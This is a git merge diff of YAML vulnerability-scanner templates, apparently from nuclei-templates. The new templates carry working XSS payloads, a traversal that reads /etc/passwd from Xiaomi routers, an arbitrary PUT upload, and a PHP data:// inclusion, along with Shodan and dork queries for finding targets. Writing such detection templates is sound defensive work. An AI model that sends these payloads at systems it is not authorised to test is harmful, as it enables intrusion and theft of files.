Merge branch 'master' into dashboard
commit
e83f9df9f2
|
@ -0,0 +1,9 @@
|
|||
cves/2013/CVE-2013-6281.yaml
|
||||
cves/2018/CVE-2018-18608.yaml
|
||||
cves/2019/CVE-2019-18371.yaml
|
||||
cves/2021/CVE-2021-45428.yaml
|
||||
cves/2022/CVE-2022-0346.yaml
|
||||
exposures/files/xampp-environment-variables.yaml
|
||||
token-spray/api-debounce.yaml
|
||||
token-spray/api-tatum.yaml
|
||||
vulnerabilities/dedecms/dedecms-config-xss.yaml
|
|
@ -0,0 +1,46 @@
|
|||
id: CVE-2013-6281
|
||||
|
||||
info:
|
||||
name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS
|
||||
author: random-robbie
|
||||
severity: medium
|
||||
description: |
|
||||
The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
|
||||
- https://www.securityfocus.com/bid/63256/
|
||||
- https://wordpress.org/plugins/dhtmlxspreadsheet/
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2013-6281
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet
|
||||
verified: "true"
|
||||
tags: cve,cve2013,wordpress,xss,wp-plugin,wp
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "page: '<script>alert(document.domain)</script>'"
|
||||
- "dhx_rel_path"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2018-18608
|
||||
|
||||
info:
|
||||
name: DedeCMS V5.7 - Cross Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
DedeCMS 5.7 SP2 allows XSS via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php.
|
||||
reference:
|
||||
- https://github.com/ky-j/dedecms/issues/8
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-18608
|
||||
- https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2018-18608
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.html:"DedeCms"
|
||||
verified: "true"
|
||||
tags: dedecms,xss,cve,cve2018
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "'><script>alert(document.domain)</script>"
|
||||
- "DedeCMS Error Warning!"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2019-18371
|
||||
|
||||
info:
|
||||
name: Xiaomi routers - Local file inclusion
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
description: |
|
||||
An issue was discovered on Xiaomi Mi WiFi R3G devices before 2.28.23-stable. There is a directory traversal vulnerability to read arbitrary files via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.
|
||||
reference:
|
||||
- https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-18371
|
||||
- https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2019-18371
|
||||
cwe-id: CWE-22
|
||||
tags: xiaomi,cve2019,cve,lfi,router,mi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -8,6 +8,7 @@ info:
|
|||
reference:
|
||||
- https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561
|
||||
- https://ssd-disclosure.com/?p=4688
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
|
@ -5,12 +5,12 @@ info:
|
|||
author: hackergautam
|
||||
severity: critical
|
||||
description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter.
|
||||
remediation: This issue is resolved in Apache Solr 8.8.2 and later.
|
||||
reference:
|
||||
- https://www.anquanke.com/post/id/238201
|
||||
- https://ubuntu.com/security/CVE-2021-27905
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
|
||||
- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
|
||||
remediation: This issue is resolved in Apache Solr 8.8.2 and later.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
|
@ -9,6 +9,7 @@ info:
|
|||
- https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
|
||||
- https://github.com/advisories/GHSA-pch5-whg9-qr2r
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-28918
|
||||
- https://github.com/rs/node-netmask
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||||
cvss-score: 9.1
|
||||
|
|
|
@ -9,6 +9,7 @@ info:
|
|||
reference:
|
||||
- https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-30461
|
||||
- https://ssd-disclosure.com/ssd-advisory--voipmonitor-unauth-rce
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
|
@ -9,6 +9,7 @@ info:
|
|||
- https://www.ambionics.io/blog/laravel-debug-rce
|
||||
- https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3129
|
||||
- https://github.com/facade/ignition/pull/334
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
|
@ -11,12 +11,12 @@ info:
|
|||
- https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
|
||||
- https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44515
|
||||
remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-44515
|
||||
cwe-id: CWE-287
|
||||
remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
|
||||
tags: cve,cve2021,cisa,zoho,rce,manageengine
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-45428
|
||||
|
||||
info:
|
||||
name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: |
|
||||
TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
|
||||
reference:
|
||||
- https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing
|
||||
- http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-45428
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-45428
|
||||
cwe-id: CWE-639
|
||||
metadata:
|
||||
shodan-query: http.html:"TLR-2005KSH"
|
||||
verified: "true"
|
||||
tags: cve,cve2021,telesquare,intrusive,fileupload
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /{{randstr}}.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
PUT /{{randstr}}.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
CVE-2021-45428
|
||||
|
||||
- |
|
||||
GET /{{randstr}}.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_1 == 404 && status_code_2 == 201'
|
||||
- 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/19
|
|
@ -10,12 +10,14 @@ info:
|
|||
- https://www.exploit-db.com/exploits/50936
|
||||
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46422
|
||||
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-46422
|
||||
cwe-id: CWE-78
|
||||
metadata:
|
||||
shodan-query: html:"SDT-CW3B1"
|
||||
verified: "false"
|
||||
tags: cve,cve2021,injection,rce
|
||||
|
||||
|
|
|
@ -0,0 +1,42 @@
|
|||
id: CVE-2022-0346
|
||||
|
||||
info:
|
||||
name: Google XML Sitemap Generator < 2.0.4 - Reflected Cross-Site Scripting & RCE
|
||||
author: Akincibor
|
||||
severity: high
|
||||
description: |
|
||||
The plugin does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
|
||||
- https://wordpress.org/plugins/www-xml-sitemap-generator-org/
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0346
|
||||
metadata:
|
||||
verified: true
|
||||
tags: xss,wp,wordpress,wp-plugin,cve,cve2022
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
|
||||
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
|
||||
- "contains(body_2, '<img src onerror=alert(document.domain)>') || contains(body_2, 'Invalid Renderer type specified')"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '>PHP Version <\/td><td class="v">([0-9.]+)'
|
|
@ -1,4 +1,4 @@
|
|||
id: CVE-2022-1598
|
||||
id: CVE-2022-1597
|
||||
|
||||
info:
|
||||
name: WPQA < 5.4 - Reflected Cross-Site Scripting
|
||||
|
@ -12,7 +12,7 @@ info:
|
|||
- https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597
|
||||
classification:
|
||||
cve-id: CVE-2022-1598
|
||||
cve-id: CVE-2022-1597
|
||||
metadata:
|
||||
verified: true
|
||||
google-dork: inurl:/wp-content/plugins/wpqa
|
|
@ -3,7 +3,7 @@ id: CVE-2022-30489
|
|||
info:
|
||||
name: Wavlink Wn535g3 - POST XSS
|
||||
author: For3stCo1d
|
||||
severity: high
|
||||
severity: medium
|
||||
description: |
|
||||
WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi.
|
||||
reference:
|
||||
|
|
|
@ -9,13 +9,14 @@ info:
|
|||
reference:
|
||||
- https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
|
||||
- https://github.com/rapid7/metasploit-framework/pull/16563
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
|
||||
- https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
|
||||
metadata:
|
||||
shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
|
||||
classification:
|
||||
cve-id: CVE-2022-30525
|
||||
metadata:
|
||||
shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
|
||||
tags: rce,zyxel,cve,cve2022,firewall,unauth
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: xampp-environment-variables
|
||||
|
||||
info:
|
||||
name: XAMPP Environment Variables Exposure
|
||||
author: melbadry9,DhiyaneshDK
|
||||
severity: low
|
||||
tags: exposure,xampp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/printenv.pl"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<TITLE>Environment Variables</TITLE>"
|
||||
- "Environment Variables:"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -12,6 +12,7 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/haproxy-status"
|
||||
- "{{BaseURL}}/haproxy?stats"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -0,0 +1,25 @@
|
|||
id: api-debounce
|
||||
|
||||
info:
|
||||
name: DeBounce API Test
|
||||
author: 0ri2N
|
||||
severity: info
|
||||
reference:
|
||||
- https://developers.debounce.io/reference/api-key-authentication
|
||||
- https://debounce.io
|
||||
tags: debounce,token-spray
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.debounce.io/v1/?api={{token}}&email=test@example.com"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"balance":'
|
||||
- '"success":'
|
||||
- '"debounce":'
|
||||
condition: and
|
|
@ -0,0 +1,28 @@
|
|||
id: api-tatum
|
||||
|
||||
info:
|
||||
name: Tatum API Test
|
||||
author: 0ri2N
|
||||
severity: info
|
||||
reference:
|
||||
- https://apidoc.tatum.io/#tag/Node-RPC
|
||||
- https://docs.tatum.io
|
||||
tags: defi,dapp,token-spray,blockchain
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "https://api-eu1.tatum.io/v3/blockchain/node/ETH/{{token}}"
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: "{\"jsonrpc\":\"2.0\",\"method\":\"web3_clientVersion\",\"params\":[ ],\"id\":1}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"id":'
|
||||
- '"result":'
|
||||
- '"jsonrpc":'
|
||||
condition: and
|
|
@ -0,0 +1,37 @@
|
|||
id: dedecms-config-xss
|
||||
|
||||
info:
|
||||
name: DedeCMS V5.7 config.php XSS
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
DeDeCMS v5.7 has an XSS vulnerability in the '/include/dialog/config.php' file, and attackers can use this vulnerability to steal user cookies, hang horses, etc.
|
||||
reference:
|
||||
- https://www.zilyun.com/8665.html
|
||||
- https://www.60ru.com/161.html
|
||||
- https://www.cnblogs.com/milantgh/p/3615853.html
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"DedeCms"
|
||||
tags: dedecms,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "location='../../</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue